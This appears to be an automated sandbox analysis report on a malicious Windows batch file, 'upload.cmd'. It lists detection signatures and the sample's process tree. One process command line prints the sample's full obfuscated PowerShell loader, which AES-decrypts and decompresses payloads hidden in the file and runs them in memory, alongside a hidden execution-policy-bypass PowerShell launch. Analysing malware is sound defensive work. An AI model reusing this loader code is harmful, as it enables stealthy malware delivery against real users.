Windows
Analysis Report
upload.cmd
Overview
General Information
Detection
| Score | 84 |
| Range | 0 - 100 |
| Whitelisted | false |
| Confidence | 100% |
Signatures
Snort IDS alert for network traffic
Yara detected Powershell decode and execute
Bypasses PowerShell execution policy
Obfuscated command line found
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Gzip Archive Decode Via PowerShell
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- cmd.exe (PID: 7040, cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\upload.cmd" ", MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6188, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 5536, cmdline: cmd /c "set __=^&rem ", MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- cmd.exe (PID: 3260, cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var) { $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execute_function($param_var,$param2_var){ $DUmer=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qdtAj=$DUmer.EntryPoint; $qdtAj.Invoke($null, $param2_var);}$eQNwc = 'C:\Users\user\Desktop\upload.cmd';$host.UI.RawUI.WindowTitle = $eQNwc;$JWNvA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eQNwc).Split([Environment]::NewLine);foreach ($gHmIc in $JWNvA) { if ($gHmIc.StartsWith('oyDvWzHHEgVkFmqgImzX')) { $PFglM=$gHmIc.Substring(20); break; }}$payloads_var=[string[]]$PFglM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (' ')); ", MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- powershell.exe (PID: 5212, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, MD5: 04029E121A0CFA5991749937DD22A1D9)
- wermgr.exe (PID: 6340, cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5212" "2620" "1284" "2624" "0" "0" "2628" "0" "0" "0" "0" "0", MD5: 74A0194782E039ACE1F7349544DC1CF4)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | |
System Summary
Source: | Author: Jonathan Cheong, oscd.community |